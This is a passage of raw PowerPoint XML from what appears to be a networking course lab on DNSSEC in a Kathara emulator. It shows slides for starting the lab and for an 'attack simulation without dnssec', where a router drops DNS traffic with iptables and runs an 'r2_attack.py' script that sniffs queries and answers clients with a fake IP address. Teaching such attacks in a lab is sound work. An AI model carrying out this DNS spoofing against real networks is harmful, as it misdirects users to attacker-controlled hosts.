              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>tart the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18437" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F0047C1-EDCB-1F0F-0171-AE4ACF9C2EB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>start the lab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
              <a:t>open any browser on the host machine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" noProof="0" dirty="0"/>
              <a:t>localhost:3001 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CF29E19-DCDA-4C58-6C04-7A1FE5DCA63F}"/>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A7C45274-624E-EA5D-81A3-71C72377CB2A}"/>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31" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F490BA6-A322-DA8D-5E95-861EE7935C44}"/>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86E9B6CA-DB16-E52B-EB47-CACD1CD9F222}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="607480" y="2668294"/>
              <a:ext cx="10972799"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dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>user@localhost</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:~$ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cd </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara-dnssec</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>user@localhost</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:~/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara-dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>$ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lstart</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6581AC74-0A3E-437A-FB6D-384DC87F3A8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="607480" y="2378845"/>
              <a:ext cx="10972800" cy="2894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28699721-3D0E-677E-B153-629DC62619B5}"/>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D0141D89-6E4F-71DF-9F37-5185247FC2AF}"/>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8" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5C61C7E-7EF5-1531-F243-AA376D5E2BD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7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{851B0B1F-5220-B5F9-3698-32984B2813A1}"/>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200840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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attack simulation without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Subtitle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B79B61F1-69C6-17E6-D70C-CE98BA054C96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DE988C7-FBA8-4B23-C0F3-629EF72A48D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{221BC5C9-C96E-CE3A-D66F-92ACEB57369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3359667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91365-2AF0-DEEA-79BA-583B0F9477A1}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="Titolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C943E1C-3798-226C-1A55-68340F192C0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>iptables command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDF56DDE-AFB5-07E4-9935-8A43A9C785FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>on r2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>block incoming DNS traffic in r2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>look at eth and loopback interfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AD3957D-B697-ED59-A343-0C5F6088D99C}"/>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88FFA8AA-42E3-31C1-4D6D-71406B759C0C}"/>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7" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9749C6E7-5A79-105F-475F-B8410B482A29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2217485" y="3133725"/>
            <a:ext cx="7757030" cy="2697167"/>
            <a:chOff x="4014773" y="2378845"/>
            <a:chExt cx="7565509" cy="2825300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{031B4DFD-61CA-6FC7-7BCC-168053C71D4D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4014776" y="2632080"/>
              <a:ext cx="7565506" cy="257206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sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@r2:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>tables –A FORWARD –d 110.0.0.10 –p </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>udp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> --</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 53 –j DROP</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23DABBE8-04CF-F0D2-3DB8-D43C996B8829}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4014773" y="2378845"/>
              <a:ext cx="7565506"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r2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C4EB488-A839-2412-EDAE-B6C20354386D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{544A6D40-A0C2-CDD6-39F8-BE7582AD57C1}"/>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2" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCC8C251-B49A-B515-B106-4878249D9B6D}"/>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3" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC2E63D0-3300-4E15-0C7F-9843770C4072}"/>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4032545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EF3F927F-1A40-BC91-E39F-FEBC03E021B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>run Python script</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73037276-E4A1-104B-93D3-4087E25E85BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>r2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>run the r2_attack script to sniff the traffic and then send the packet with the fake IP address to the client who made the query.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B5151A3-786F-879B-2E77-686FD1857F40}"/>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B230EF6A-E371-9131-42E1-4EA313E8BFF4}"/>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5" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38F7B1B9-A325-C3E5-5BC0-6FEA7781803D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1832189" y="3464424"/>
            <a:ext cx="8527621" cy="2683937"/>
            <a:chOff x="4868024" y="2378845"/>
            <a:chExt cx="6736490" cy="2064838"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8375F2A9-AC72-8B87-6BF7-981C001347D2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4868025" y="2659116"/>
              <a:ext cx="6736489" cy="1784567"/>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sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>iptables –A FORWARD –d 110.0.0.10 –p </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>udp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> --</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 53 –j DROP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@r2:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>python3 r2_attack.py</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CECE6BD3-20E6-06AD-FF6E-B7FF07921F06}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4868024" y="2378845"/>
              <a:ext cx="671225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r2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="18" name="Group 14">
              <a:extLst>
